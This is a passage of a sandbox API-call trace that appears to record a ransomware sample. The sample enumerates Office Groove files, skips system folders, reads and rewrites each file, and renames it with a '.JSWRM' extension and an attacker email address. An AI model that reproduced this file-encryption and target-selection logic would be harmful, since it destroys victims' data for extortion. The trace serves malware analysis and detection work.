lpUsedDefaultChar=0x0) returned 16 [0132.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\StatusOnline.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\statusonline.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.049] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2862) returned 1 [0132.049] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.049] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xb20, lpOverlapped=0x0) returned 1 [0132.050] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.051] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xb20, lpOverlapped=0x0) returned 1 [0132.051] CloseHandle (hObject=0x314) returned 1 [0132.051] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\StatusOnline.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\statusonline.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\StatusOnline.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\statusonline.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.052] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="TOOLICON.ICO", cAlternateFileName="")) returned 1 [0132.052] lstrcmpiW (lpString1="TOOLICON.ICO", lpString2=".") returned 1 [0132.052] lstrcmpiW (lpString1="TOOLICON.ICO", lpString2="..") returned 1 [0132.052] lstrcmpiW (lpString1="TOOLICON.ICO", lpString2="...") returned 1 [0132.052] lstrcmpiW (lpString1="TOOLICON.ICO", lpString2="windows") returned -1 [0132.052] lstrcmpiW (lpString1="TOOLICON.ICO", lpString2="recovery") returned 1 [0132.052] lstrcmpiW (lpString1="TOOLICON.ICO", lpString2="perflogs") returned 1 [0132.052] lstrcmpiW (lpString1="TOOLICON.ICO", lpString2="documents and settings") returned 1 [0132.052] lstrcmpiW (lpString1="TOOLICON.ICO", lpString2="$RECYCLE.BIN") returned 1 [0132.052] lstrcmpiW (lpString1="TOOLICON.ICO", lpString2="system volume information") returned 1 [0132.052] lstrcmpiW (lpString1="TOOLICON.ICO", lpString2="msocache") returned 1 [0132.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TOOLICON.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TOOLICON.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TOOLICON.ICO", lpUsedDefaultChar=0x0) returned 12 [0132.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TOOLICON.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TOOLICON.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TOOLICON.ICO", lpUsedDefaultChar=0x0) returned 12 [0132.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\TOOLICON.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\toolicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.053] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=10134) returned 1 [0132.053] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.053] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2790, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x2790, lpOverlapped=0x0) returned 1 [0132.056] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.056] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x2790, lpOverlapped=0x0) returned 1 [0132.056] CloseHandle (hObject=0x314) returned 1 [0132.056] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\TOOLICON.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\toolicon.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\TOOLICON.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\toolicon.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.057] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7beb2bc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7beb2bc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2366, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="WSS.ICO", cAlternateFileName="")) returned 1 [0132.057] lstrcmpiW (lpString1="WSS.ICO", lpString2=".") returned 1 [0132.057] lstrcmpiW (lpString1="WSS.ICO", lpString2="..") returned 1 [0132.057] lstrcmpiW (lpString1="WSS.ICO", lpString2="...") returned 1 [0132.057] lstrcmpiW (lpString1="WSS.ICO", lpString2="windows") returned 1 [0132.057] lstrcmpiW (lpString1="WSS.ICO", lpString2="recovery") returned 1 [0132.057] lstrcmpiW (lpString1="WSS.ICO", lpString2="perflogs") returned 1 [0132.057] lstrcmpiW (lpString1="WSS.ICO", lpString2="documents and settings") returned 1 [0132.057] lstrcmpiW (lpString1="WSS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0132.057] lstrcmpiW (lpString1="WSS.ICO", lpString2="system volume information") returned 1 [0132.057] lstrcmpiW (lpString1="WSS.ICO", lpString2="msocache") returned 1 [0132.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WSS.ICO", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0132.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WSS.ICO", cchWideChar=7, lpMultiByteStr=0x345e870, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSS.ICO", lpUsedDefaultChar=0x0) returned 7 [0132.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WSS.ICO", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0132.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WSS.ICO", cchWideChar=7, lpMultiByteStr=0x345e840, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSS.ICO", lpUsedDefaultChar=0x0) returned 7 [0132.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\WSS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\wss.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.058] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9062) returned 1 [0132.058] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.058] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2360, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x2360, lpOverlapped=0x0) returned 1 [0132.060] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.060] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2360, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x2360, lpOverlapped=0x0) returned 1 [0132.061] CloseHandle (hObject=0x314) returned 1 [0132.061] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\WSS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\wss.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\WSS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\wss.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.061] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x637c06e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x637c06e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x637c06e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="WSS_DocLib.ico", cAlternateFileName="WSS_DO~1.ICO")) returned 1 [0132.062] lstrcmpiW (lpString1="WSS_DocLib.ico", lpString2=".") returned 1 [0132.062] lstrcmpiW (lpString1="WSS_DocLib.ico", lpString2="..") returned 1 [0132.062] lstrcmpiW (lpString1="WSS_DocLib.ico", lpString2="...") returned 1 [0132.062] lstrcmpiW (lpString1="WSS_DocLib.ico", lpString2="windows") returned 1 [0132.062] lstrcmpiW (lpString1="WSS_DocLib.ico", lpString2="recovery") returned 1 [0132.062] lstrcmpiW (lpString1="WSS_DocLib.ico", lpString2="perflogs") returned 1 [0132.062] lstrcmpiW (lpString1="WSS_DocLib.ico", lpString2="documents and settings") returned 1 [0132.062] lstrcmpiW (lpString1="WSS_DocLib.ico", lpString2="$RECYCLE.BIN") returned 1 [0132.062] lstrcmpiW (lpString1="WSS_DocLib.ico", lpString2="system volume information") returned 1 [0132.062] lstrcmpiW (lpString1="WSS_DocLib.ico", lpString2="msocache") returned 1 [0132.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WSS_DocLib.ico", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WSS_DocLib.ico", cchWideChar=14, lpMultiByteStr=0x345e870, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSS_DocLib.ico", lpUsedDefaultChar=0x0) returned 14 [0132.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WSS_DocLib.ico", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WSS_DocLib.ico", cchWideChar=14, lpMultiByteStr=0x345e840, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSS_DocLib.ico", lpUsedDefaultChar=0x0) returned 14 [0132.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\WSS_DocLib.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\wss_doclib.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.063] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2862) returned 1 [0132.063] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.063] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xb20, lpOverlapped=0x0) returned 1 [0132.074] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.074] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xb20, lpOverlapped=0x0) returned 1 [0132.074] CloseHandle (hObject=0x314) returned 1 [0132.074] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\WSS_DocLib.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\wss_doclib.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\WSS_DocLib.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\wss_doclib.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.076] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x637c06e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x637c06e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x637c06e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="WSS_DocLib.ico", cAlternateFileName="WSS_DO~1.ICO")) returned 0 [0132.076] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0132.076] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ToolIcons", cAlternateFileName="TOOLIC~1")) returned 0 [0132.076] FindClose (in: hFindFile=0x231cc0 | out: hFindFile=0x231cc0) returned 1 [0132.077] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdd36584, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdf403dbb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdf58154c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf370c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="GROOVE.EXE", cAlternateFileName="")) returned 1 [0132.077] lstrcmpiW (lpString1="GROOVE.EXE", lpString2=".") returned 1 [0132.077] lstrcmpiW (lpString1="GROOVE.EXE", lpString2="..") returned 1 [0132.077] lstrcmpiW (lpString1="GROOVE.EXE", lpString2="...") returned 1 [0132.077] lstrcmpiW (lpString1="GROOVE.EXE", lpString2="windows") returned -1 [0132.077] lstrcmpiW (lpString1="GROOVE.EXE", lpString2="recovery") returned -1 [0132.077] lstrcmpiW (lpString1="GROOVE.EXE", lpString2="perflogs") returned -1 [0132.077] lstrcmpiW (lpString1="GROOVE.EXE", lpString2="documents and settings") returned 1 [0132.077] lstrcmpiW (lpString1="GROOVE.EXE", lpString2="$RECYCLE.BIN") returned 1 [0132.077] lstrcmpiW (lpString1="GROOVE.EXE", lpString2="system volume information") returned -1 [0132.077] lstrcmpiW (lpString1="GROOVE.EXE", lpString2="msocache") returned -1 [0132.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE.EXE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0132.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE.EXE", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE.EXE", lpUsedDefaultChar=0x0) returned 10 [0132.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE.EXE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0132.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE.EXE", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE.EXE", lpUsedDefaultChar=0x0) returned 10 [0132.077] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x154, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="GROOVE.VisualElementsManifest.xml", cAlternateFileName="GROOVE~1.XML")) returned 1 [0132.077] lstrcmpiW (lpString1="GROOVE.VisualElementsManifest.xml", lpString2=".") returned 1 [0132.077] lstrcmpiW (lpString1="GROOVE.VisualElementsManifest.xml", lpString2="..") returned 1 [0132.077] lstrcmpiW (lpString1="GROOVE.VisualElementsManifest.xml", lpString2="...") returned 1 [0132.077] lstrcmpiW (lpString1="GROOVE.VisualElementsManifest.xml", lpString2="windows") returned -1 [0132.077] lstrcmpiW (lpString1="GROOVE.VisualElementsManifest.xml", lpString2="recovery") returned -1 [0132.077] lstrcmpiW (lpString1="GROOVE.VisualElementsManifest.xml", lpString2="perflogs") returned -1 [0132.077] lstrcmpiW (lpString1="GROOVE.VisualElementsManifest.xml", lpString2="documents and settings") returned 1 [0132.077] lstrcmpiW (lpString1="GROOVE.VisualElementsManifest.xml", lpString2="$RECYCLE.BIN") returned 1 [0132.077] lstrcmpiW (lpString1="GROOVE.VisualElementsManifest.xml", lpString2="system volume information") returned -1 [0132.077] lstrcmpiW (lpString1="GROOVE.VisualElementsManifest.xml", lpString2="msocache") returned -1 [0132.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE.VisualElementsManifest.xml", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0132.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE.VisualElementsManifest.xml", cchWideChar=33, lpMultiByteStr=0x22d0d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 33 [0132.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE.VisualElementsManifest.xml", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0132.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE.VisualElementsManifest.xml", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 33 [0132.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\GROOVE.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove.visualelementsmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0132.079] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=340) returned 1 [0132.079] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.079] ReadFile (in: hFile=0x45c, lpBuffer=0x21c578, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345ec04*=0x150, lpOverlapped=0x0) returned 1 [0132.080] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.080] WriteFile (in: hFile=0x45c, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345ec00*=0x150, lpOverlapped=0x0) returned 1 [0132.080] CloseHandle (hObject=0x45c) returned 1 [0132.080] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\GROOVE.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove.visualelementsmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\GROOVE.VisualElementsManifest.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove.visualelementsmanifest.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.081] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: 